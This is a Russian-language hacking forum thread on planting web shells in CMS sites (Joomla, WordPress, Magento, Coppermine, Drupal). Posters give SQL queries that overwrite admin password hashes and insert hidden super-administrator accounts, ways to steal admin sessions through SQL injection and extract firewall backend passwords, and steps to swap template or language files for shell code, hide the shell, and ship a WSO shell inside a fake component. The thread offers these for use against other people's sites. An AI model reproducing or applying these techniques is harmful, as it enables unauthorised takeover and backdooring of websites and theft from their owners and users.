Заливка шелла в CMS

[}{оттабыч]

Цитата:

Сообщение от nikp

Joomla

Удобно, если есть возможность изменять jos_users, например доступен phpMyAdmin.

- сохраняем jos_users
- меняем username и password на

admin
a458d1ff993a5b5ebdc483536bb8a3c6:H6AIIOKetGMm9EaSR snlq06yw2MunwRu

встречается два типа хеша, если md5, то
e10adc3949ba59abbe56e057f20f883e

Можно не редактировать админа, а добавить нового.

заходим в админку, admin:123456, дальше три варианта

- Общие настройки->Система, настраиваем разрешенные расширения для Медиа менеджера и заливаем через него. Путь виден.

- Редактируем Расширения->Менеджер шаблонов, проверяем доступность на запись (зеленый цвет каталога) выбираем неактивный шаблон, запоминаем, заменяем на код шелла, сохраняем, видим путь до шелла, запускаем его, переписываем в другое место, маскируем. Возвращаем шаблон на место.

- Редактируем Расширения->Менеджер языков, аналогично шаблонам (иногда редактирование недоступно)

Возвращаем исходное состояние jos_users.

PS проверял для версии <= 1.5.15.

Еще через пакет в менеджере расширений можно, тупо выбераем шелл и он будет в /tmp из веба. Аналогично из "Установить из URL". Чтоб попасть в бекенд и делать все эти манипуляции, например, имея SQL inj, можно прочитать сессию админа(найти можно по id или username в #__session), теперь пасс уже сложный, phpass в той джумле. )

[}{оттабыч]

Цитата:

Сообщение от }{оттабыч

Еще через пакет в менеджере расширений можно, тупо выбераем шелл и он будет в /tmp из веба. Аналогично из "Установить из URL". Чтоб попасть в бекенд и делать все эти манипуляции, например, имея SQL inj, можно прочитать сессию админа(найти можно по id или username в #__session), теперь пасс уже сложный, phpass в той джумле. )

Еще некоторое дополнение: иногда администарторы ставят дополнительный backend-пароль с использованием rsfirewall, так от в БД в табличке #_rsfirewall_configuration в колонке backend_password находится этот пароль в md5.

Цитата:

Сообщение от }{оттабыч

В компонент для Joomla 2.5 и 1.5 вложил сжатый шелл wso без пасса
скачать

шелл доступен по адресу:
/components/com_helloworld/helloworld.php joomla 2.5
/components/com_hello/hello.php joomla 1.5

Второй компонент еще заливается на Joomla 3 ветки(проверено на Joomla 3.2.3)

Цитата:

Сообщение от nikp

Joomla

Удобно, если есть возможность изменять jos_users, например доступен phpMyAdmin.

- сохраняем jos_users
- меняем username и password на

admin
a458d1ff993a5b5ebdc483536bb8a3c6:H6AIIOKetGMm9EaSR snlq06yw2MunwRu

встречается два типа хеша, если md5, то
e10adc3949ba59abbe56e057f20f883e

Можно не редактировать админа, а добавить нового.

заходим в админку, admin:123456, дальше три варианта

- Общие настройки->Система, настраиваем разрешенные расширения для Медиа менеджера и заливаем через него. Путь виден.

- Редактируем Расширения->Менеджер шаблонов, проверяем доступность на запись (зеленый цвет каталога) выбираем неактивный шаблон, запоминаем, заменяем на код шелла, сохраняем, видим путь до шелла, запускаем его, переписываем в другое место, маскируем. Возвращаем шаблон на место.

- Редактируем Расширения->Менеджер языков, аналогично шаблонам (иногда редактирование недоступно)

Возвращаем исходное состояние jos_users.

PS проверял для версии <= 1.5.15.

Код:

UPDATE `jos_users` SET `password`= md5('123456') WHERE `id`=62;

Joomla 1,2,3, все кушают такой md5 норм )

[}{оттабыч]

Цитата:

Сообщение от }{оттабыч

Код:

UPDATE `jos_users` SET `password`= md5('123456') WHERE `id`=62;

Joomla 1,2,3, все кушают такой md5 норм )

Wordpress также кушает такой md5 норм)

Например, имея доступ к БД соседа, можно, вместо

Код:

update `wp_users` set `user_pass`='$P$BX9kp6Gnd23dz8vv4doZSSvI.awvZr.' where id=3

написать

Код:

update `wp_users` set `user_pass`= md5('admin') where id=3

После авторизации в БД будет более секурный хеш.

Ссылки:
http://www.openwall.com/phpass/
http://eamann.com/tech/wordpress-password-hashing/

Цитата:

To prevent breaking backwards compatibility, MD5-hashed passwords stored in the database are still valid. When a user logs in with such a password, WordPress detects MD5 was used, rehashes the password using the more secure method, and stores the new hash in the database.

[Hodor]

подскажите как залить шел через админку ez publish 4.6 версии
как я понял, чтобы залить свой темплейт с пхп кодом надо править сеттинг.ини
есть какие то еще способы?

[pres]

Цитата:

Сообщение от vp$

Magento



заливка шела
1. Если не установлен Unirgy Installer, устанавливаем оф.видео http://www.youtube.com/watch?v=E3IlOX4-73Q
2. System -> tools -> Unirgy Installer - > Manage modules
3. Скачиваем любой модуль например Unirgy_Giftcert
4. закидываем в архив например в папку /skin/ наш шел shell.php
5. System -> tools -> Unirgy Installer - > Add Modules
6. Закачиваем модифицированный модуль прямым линком
7. site.com/skin/shell.php

Если он не установлен, то его и не установить.

[pres]

Через Magento Downloader(MagentoConnect Manager, он же установщик расширений) закачиваю расширение - оно нормально устанавливается, пытаюсь добавить свой файл туда - оно не ставится, выдает ошибку записи совершенно другого файла из расширения.
Пробовал вообще ничего не менять в пакете и не добавлять, распаковываю, потом снова запаковываю - уже не принимает с той же ошибкой записи. Почему так происходит?

[nomad]

Coppermine Photo Gallery 1.4.16 (stable), возможно, другие версии

Зависимость - административный доступ
1) upload.php -> "Загрузка ссылок", загружаем со своего хоста текстовый файл с текстом

PHP код:

<?php phpinfo(); ?>

2) admin.php -> Настройки тем -> Путь к дополнительному файлу нижней части страницы галереи
Тут прописываем файл к своему загруженному файлу в виде albums/userpics/10011/test.txt
Код, записанный в test.txt, выполняется - видим инфо о пхп.

ЗЫ Думаю, что можно и с расширением jpg загружать, не обязательно тхт, пишу как сам делал.

[smerch]

доброго дня всем!
Подскажите плз, CMS Drupal 7.22
есть доступ к админке, каким макаром там шелл залить можно?
PHP filter отключен.
За ранее благодарен.
PS разобрался, залился.

[omen666]

Цитата:

Сообщение от }{оттабыч

Еще некоторое дополнение: иногда администарторы ставят дополнительный backend-пароль с использованием rsfirewall, так от в БД в табличке #_rsfirewall_configuration в колонке backend_password находится этот пароль в md5.Второй компонент еще заливается на Joomla 3 ветки(проверено на Joomla 3.2.3)

Код:

UPDATE `jos_users` SET `password`= md5('123456') WHERE `id`=62;

Joomla 1,2,3, все кушают такой md5 норм )

только вот так #__rsfirewall_configuration

Только что был случай, что в колонке value находится хеш md5, если where name='backend_password'

тащить вот так concat_ws(0x3a,name,value)

короче, возможно 2 варианта, я хотел сказать:

1. в БД в табличке #__rsfirewall_configuration в колонке backend_password находится этот пароль в md5.
2. select concat_ws(0x3a,name,value) from #__rsfirewall_configuration where name='backend_password'

2 рабочий, только что попалось, что у меня.

[omen666]

Касаемо Joomla =)

Иногда можно прочитать конфиги и приконектиться к БД, например, шелл по соседству и т.д.

Мы можем создать нового админа, а также сбросить пасс старого.

Чтоб создать админа в ветке >= 2.5
SELECT id from jos_users; -> смотрим свободный ID

Запрос на добавление
INSERT INTO jos_users(id,name,username,email,password,usertype ,block,sendEmail,registerDate,lastvisitDate,activa tion,params,lastResetTime,resetCount) VALUES ('728', 'blade', 'blade', 'blade@mailforspam.com','531b5f50f082c59730b3bf7f9 c457129:GA8lZqlJVZQbD8GYFGltJGNNIvjmcRcT', 'Super Administrator', '0', '1', '', '', '', '', '', '0');

Наш хеш
531b5f50f082c59730b3bf7f9c457129:GA8lZqlJVZQbD8GYF GltJGNNIvjmcRcT => 123 это наш пароль

Добавляем в групу админов
INSERT INTO jos_user_usergroup_map values (728,8);

Если нужно удалить, то вот запросы
DELETE FROM jos_user_usergroup_map where user_id=728;
DELETE FROM jos_users where id=728;

Теперь расмотрим как создать админа Joomla ветки 1.5, пишу без объяснений тут уже
SELECT id from jos_users;

INSERT INTO jos_users(id,name,username,email,password,usertype ,block,sendEmail,gid) values(100,'newadmin','admin','123@example.com','5 31b5f50f082c59730b3bf7f9c457129:GA8lZqlJVZQbD8GYFG ltJGNNIvjmcRcT','Super Administrator',0,1,25);
'531b5f50f082c59730b3bf7f9c457129:GA8lZqlJVZQbD8GY FGltJGNNIvjmcRcT = 123

INSERT INTO jos_core_acl_aro VALUES (100,'users','100',0,'Administrator',0);
INSERT INTO jos_core_acl_groups_aro_map VALUES (25,'',100);
DELETE FROM jos_core_acl_groups_aro_map where aro_id=100;

DELETE from jos_core_acl_aro where id=100;
DELETE from jos_users where id=100;

Или можно сменить пасс и усе )
UPDATE `main_users` SET `password`= md5('123') WHERE `id`=837;
UPDATE `main_users` SET `password`= 'e2cd990b203805ca53fb765e34e8f79a:rPU13Eip5jxRj65s sgE1edHW9CGOU5Kq' WHERE `id`=837;

Значит, у нас есть администратор, но зачастую мы не можем попасть в админку, так как не знаем URL сайта.
Иногда нам и необязательно и сама админчасть, бывают случаи, что можно залиться с фронтенда, главное залогиниться з правами и поиследовать си-му.

Как узнать URL сайта на Joomla?
Переменная $live_site в configuration.php в корне(обычно пустая, но при переезде на новый домен и т.д объявляют)
колонки old_url, referer в jos_redirect_links
конфиги веб-сервера
reverse ip lookup